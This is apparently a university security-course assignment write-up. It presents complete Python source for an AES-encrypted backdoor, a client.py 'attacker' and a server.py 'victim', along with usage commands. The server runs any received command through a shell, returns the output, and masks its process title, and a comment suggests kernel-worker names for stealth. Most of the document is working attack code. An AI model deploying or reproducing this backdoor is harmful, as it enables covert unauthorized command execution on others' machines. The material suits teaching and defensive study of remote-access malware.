A backdoor is perceived as a negative vulnerability because it allows an attacker to obtain access to a victim’s machine without proper credentials. However, a backdoor is more than just a tool of exploitation. Generally speaking, the purpose of a backdoor is to allow access to a machine, implemented into the program by the programmer. This is without a doubt a security flaw, however, it is also a tool used for debugging and analytical purposes.
This assignment demonstrates a backdoor program where the attacker is capable of executing shell commands on the victim’s machine and returns the response to the attacker.
Requirements
+ Backdoor must camouflage itself so as to deceive anyone looking at the process table.
+ Application must ensure that it only receives (authenticate) those packets that are meant for the backdoor itself.
+ The backdoor must interpret commands sent to it, execute them and send the results back.
+ Incorporate an encryption scheme of your choice into the backdoor.
Implementation
The program is written in python. There are two programs included in this assignment:
1. client.py (Attacker)
2. server.py (Backdoor Victim)
The client (attacker) program establishes a connection to the server (Victim) and will be able to execute Linux commands against the victim’s machine. The messages will be encrypted using the AES encryption scheme while sending data to the server. When the victim sends the message back to the client, it will be encrypted once again; hence, the message will be decrypted to plaintext.
The server (victim) will acquire the encrypted data, decrypt it and execute the command. The command will not appear on the victim’s message to emulate a hidden backdoor. The server then encrypts that
data, again with AES, and transmit the data back to the client.
The program uses two libraries:
1. pycrypto 2.6.1 – For Encryption
2. setproctitle 1.1.8 – To masquerade process title
It is important to note that to ensure that the attacking machine is also authenticating the packets by utilizing the secret key used (for encryption) as a form of a flag. Any other traffic will be ignored
Note: Both program requires pycrypto library to be installed Additionally, the server requires the setproctitle library to be installed
You may download the libraries from the links below:
– https://pypi.python.org/packages/source/p/pycrypto/pycrypto-2.6.1.tar.gz
– https://pypi.python.org/packages/source/s/setproctitle/setproctitle-1.1.8.tar.gz#md5=728f4c8c6031bbe56083a48594027edd
Client :
Backdoor-Client (Attacker Diagram)
#!/usr/bin/python
'''
COMP 8505 - Assignment 3
Backdoor - Client (Attacker) by Jeffrey Sasaki
The client program will allow remote access to the victim's machine, allowing
the user to execute linux commands on the victims machine.
The program will output the executed command given by the victim.
'''
from Crypto.Cipher import AES
from Crypto import Random
import socket
import base64
import os
import optparse
import sys
# encrypt/encode and decrypt/decode a string
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e))
# random secret key (both the client and server must match this key)
secret = "sixteen byte key"
iv = Random.new().read(AES.block_size)
cipher = AES.new(secret, AES.MODE_CFB, iv)
# parse command line argument
parser = optparse.OptionParser("usage: python client.py -d <host ip> -p <port>")
parser.add_option('-d', dest='host', type = 'string', help = 'target host IP')
parser.add_option('-p', dest='port', type = 'int', help = 'target port')
(options, args) = parser.parse_args()
if (options.host == None):
print parser.usage
sys.exit()
elif (options.port == None):
print parser.usage
sys.exit()
else:
host = options.host
port = options.port
# connect to the server host
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# main
while True:
data = s.recv(1024)
# decrypt data
decrypted = DecodeAES(cipher, data)
# check for end of file
if decrypted.endswith(secret) == True:
# print command
print decrypted[:-16]
# get command
cmd = raw_input("[remote shell]$ ")
# encrypt command
encrypted = EncodeAES(cipher, cmd)
# send encrypted command
s.send(encrypted)
# check if user typed "exit" to leave remote shell
if cmd == "exit":
break
else:
print decrypted
s.close()
sys.exit()Server :
Backdoor-Server (Victim Diagram)
#!/usr/bin/python
'''
COMP 8505 - Assignment 3
Backdoor - Server (Victim) by Jeffrey Sasaki
The server program will execute a command given by the client (attacker) and
outputs the response back to the client.
'''
from Crypto.Cipher import AES
from Crypto import Random
import socket
import base64
import os
import subprocess
import optparse
import sys
import setproctitle
# masquerade process title
# NOTE: generally a backdoor would not be named "backdoor" a recommended process
# title would be something like "[kworker/0:0H]" or
# "/usr/bin/systemd/systemd-login"
title = "backdoor"
setproctitle.setproctitle(title)
# encrypt/encode and decrypt/decode a string
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e))
# random secret key (both the client and server must match this key)
secret = "sixteen byte key"
iv = Random.new().read(AES.block_size)
# create cipher object
cipher = AES.new(secret, AES.MODE_CFB, iv)
# parse command line argument
# generally any output would be concealed on the server (victim's) side
parser = optparse.OptionParser("usage: python server.py -p <port>")
parser.add_option('-p', dest='port', type = 'int', help = 'port')
(options, args) = parser.parse_args()
if (options.port == None):
print parser.usage
sys.exit()
else:
port = options.port
# listen for client
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.bind(('0.0.0.0', port))
c.listen(1)
s, a = c.accept()
s.send(EncodeAES(cipher, 'You are connected' + secret))
while True:
data = s.recv(1024)
# decrypt data
decrypted = DecodeAES(cipher, data)
# check for "exit" by the attacker
if decrypted == "exit":
break
# execute command
proc = subprocess.Popen(decrypted, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdoutput = proc.stdout.read() + proc.stderr.read() + secret
# encrypt output
encrypted = EncodeAES(cipher, stdoutput)
# send encrypted output
s.send(encrypted)
s.close()
sys.exit()Usage :
On the target's machine, type: $ python server.py -p (port) & On the attacker's machine, type: $ python client.py -d (host ip) -p (port)
Source : https://github.com/jeffreysasaki